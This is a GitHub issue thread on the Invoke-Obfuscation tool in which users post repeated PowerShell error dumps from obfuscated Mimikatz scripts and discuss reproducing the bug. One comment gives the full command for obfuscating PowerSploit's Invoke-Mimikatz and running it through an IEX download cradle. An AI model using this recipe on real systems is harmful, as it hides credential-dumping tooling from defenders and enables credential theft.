+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
from invoke-obfuscation.
Man, this continues to stump me. I'm not seeing this error for PS 2, 3 or 4. I wonder if there's something peculiar to Windows Server 2012. Would you mind uploading the obfuscated script that you used to get the errors that you posted above? This will help me find out how to best replicate this issue so I can get it fixed. Thanks.
from invoke-obfuscation.
Sure, that script is uploaded here: https://cl.ly/jVlg
I just tested it on Windows 8.1 (PS 4.0) as well, and it gives the exact same error(s).
from invoke-obfuscation.
@danielbohannon I cannot confirm, but downloading the ModernIE VMs might help you reproduce the issue. There you will get a standard Windows 7/8/10 machine with their default PowerShell version.
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
After further testing, I can tell you for sure that some stages are not working on Win7 with the default (I hope) PS while working on Win10. Sorry I cannot give you more feedback than that.
from invoke-obfuscation.
@danielbohannon bump. Any update on this issue?
from invoke-obfuscation.
@byt3bl33d3r -- thanks for holding my feet to the fire :) Unfortunately I've not had a chance to get a VM set up where I can successfully reproduce this issue. I've got a couple of long flights in the coming weeks so hopefully I can sink some time into reproducing this issue and getting this resolved. This issue has been open for far longer than I like, so my apologies for that.
from invoke-obfuscation.
@danielbohannon no worries! Thanks for the update! If there's anything else I can do to help, let me know.
Cheers man.
from invoke-obfuscation.
Thank you all for this information.
from invoke-obfuscation.
I just came across this issue myself. It was PowerShell in Kali rolling, with PowerShell 6.1.0; obfuscating the same payload from Empire in Windows 10 worked without issue.
from invoke-obfuscation.
I currently have the same problem on two Windows hosts.
I used the following command line:
Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet > Kingdom3.ps1
On my Windows 10 Hosts with the following Powershell Version:
Name Value
PSVersion 5.1.17134.228
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.17134.228
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
Running the following commands:
PS C:\Test> IEX (New-Object Net.WebClient).DownloadString("C:\Test\Kingdom3.ps1")
PS C:\Test> INVOKE-MIMIkAtz
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:825 char:6
+ ${GETPRoCad`D`ReSS} = ${UNsaf`ena`T`i`VEMEtHo`Ds}.("{0}{2}{1} ...
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DotNetMethodException
You cannot call a method on a null-valued expression.
At line:832 char:6
+ &("{1}{0}{2}"-f'ut','Write-O','put') ${GETprOCa`DDR`Ess}."InV ...
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:428 char:3
+ ${VIr`Tu`A`laLlOC} = ( gET-vARIaBLe l2gRm ).value::("{4}{ ...
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodCountCouldNotFindBest
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:825 char:6
+ ${GETPRoCad`D`ReSS} = ${UNsaf`ena`T`i`VEMEtHo`Ds}.("{0}{2}{1} ...
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DotNetMethodException
Has there already been a solution?
Thanks!
from invoke-obfuscation.